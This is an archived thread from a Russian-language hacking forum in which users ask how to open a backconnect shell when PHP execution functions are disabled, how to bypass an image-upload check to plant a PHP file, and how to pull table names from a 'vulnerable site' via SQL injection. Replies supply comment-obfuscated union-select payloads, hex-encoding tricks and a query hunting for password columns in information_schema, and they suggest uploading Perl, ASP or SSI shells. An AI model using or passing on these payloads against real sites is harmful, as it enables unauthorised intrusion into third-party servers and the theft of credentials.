ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
30.10.2012, 09:53
|
|
Новичок
Регистрация: 01.08.2009
Сообщений: 12
Провел на форуме:
104424
Репутация:
0
|
|
Как организовать backconnect/bind при отключенных функциях php
exec,passthru,shell_exec,system,proc_open,popen?
Если можно, подробнее.
|
|
|
30.10.2012, 10:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
29647
Репутация:
1
|
|
Сообщение от stan_q
stan_q said:
Как организовать backconnect/bind при отключенных функциях php
exec,passthru,shell_exec,system,proc_open,popen?
Если можно, подробнее.
Какие еще оболочки присутствуют на серваке?
Попробуй залить Шеллы на перле,асп'е,ssi
На них уже ограничения не действуют
|
|
|
|
30.10.2012, 12:14
|
|
Новичок
Регистрация: 19.05.2010
Сообщений: 6
Провел на форуме:
7830
Репутация:
4
|
|
|
|
|
|
30.10.2012, 12:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
3933
Репутация:
0
|
|
Здравствуйте, вопрос такой:
Сообщение от None
$size = getimagesize($_FILES[$formName]['tmp_name']);
$format = strtolower(substr($size['mime'], strpos($size['mime'], '/')+1));
move_uploaded_file($_FILES[$formName]['tmp_name'], $G_Settings["DIR_IMG"]."/{$G_Settings["IMG_NAMES"]}.{$format}")
Изображение заливается, и присваивается ему расширение исходя из Mime Type От getimagesize
Как обойти и чтобы назначилось php Значение? |
|
|
|
30.10.2012, 13:24
|
|
Новичок
Регистрация: 01.08.2009
Сообщений: 12
Провел на форуме:
104424
Репутация:
0
|
|
Сообщение от blesse
blesse said:
Какие еще оболочки присутствуют на серваке?
Попробуй залить Шеллы на перле,асп'е,ssi
На них уже ограничения не действуют
Нету ничего, окромя пхп.
kroŧ
Сообщение от None
Обратные кавычки недоступны, в случае, если включен безопасный режим или отключена функция shell_exec().
У меня функция отключена
|
|
|
|
30.10.2012, 21:15
|
|
Новичок
Регистрация: 11.07.2009
Сообщений: 3
Провел на форуме:
19069
Репутация:
0
|
|
на друпал 5.23 есть уязвимость с мускулом?
|
|
|
|
31.10.2012, 02:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
7946
Репутация:
5
|
|
такой вопрос. есть уязвимый сайт. мускул 5версия. не знаю префикс таблицы...
при инъекции
Сообщение от None
-235/**//*!union*//**//*!select*//**/version(),2,3/**//*!from*//**/--
все ок, т.е. вывод есть
но когда пытаюсь получить имена таблиц
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]235[/COLOR][COLOR="#FF8000"]/**//*!union*//**//*!select*//**/[/COLOR][COLOR="#0000BB"]group_concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]table_name[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#FF8000"]/**//*!from*//**/[/COLOR][COLOR="#0000BB"]information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables[/COLOR][COLOR="#007700"]--[/COLOR][/COLOR]
сайт ругается
Сообщение от None
Internal Server Error The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator, 4564646@6456456.456 and inform them of the time the error occurred, and anything you might have done that may have caused the error. More information about this error may be available in the server error log.
как вытащить имена ? |
|
|
|
31.10.2012, 02:48
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от ukrpunk
ukrpunk said:
такой вопрос. есть уязвимый сайт. мускул 5версия. не знаю префикс таблицы...
при инъекции
все ок, т.е. вывод есть
но когда пытаюсь получить имена таблиц
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]235[/COLOR][COLOR="#FF8000"]/**//*!union*//**//*!select*//**/[/COLOR][COLOR="#0000BB"]group_concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]table_name[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#FF8000"]/**//*!from*//**/[/COLOR][COLOR="#0000BB"]information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables[/COLOR][COLOR="#007700"]--[/COLOR][/COLOR]
сайт ругается
как вытащить имена ? А unhex(hex('xyu')) попробовать?
|
|
|
|
31.10.2012, 02:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
7946
Репутация:
5
|
|
Сообщение от Cennarios
Cennarios said:
А unhex(hex('xyu')) попробовать?
пробовал - ругается. попробовал вот так
Сообщение от None
unhex('7461626c655f6e616d65')
вывело тупо table_name,table_name,table_name
|
|
|
|
31.10.2012, 03:02
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от ukrpunk
ukrpunk said:
пробовал - ругается. попробовал вот так
вывело тупо table_name,table_name,table_name
Начнем с того, что частенько фильтруется или для юзера нет прав на _schema.tables, быть может поможет что-то вида:
union select group_concat(table_name) from information_schema.columns where column_name like '%pass%' (или hex представление)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
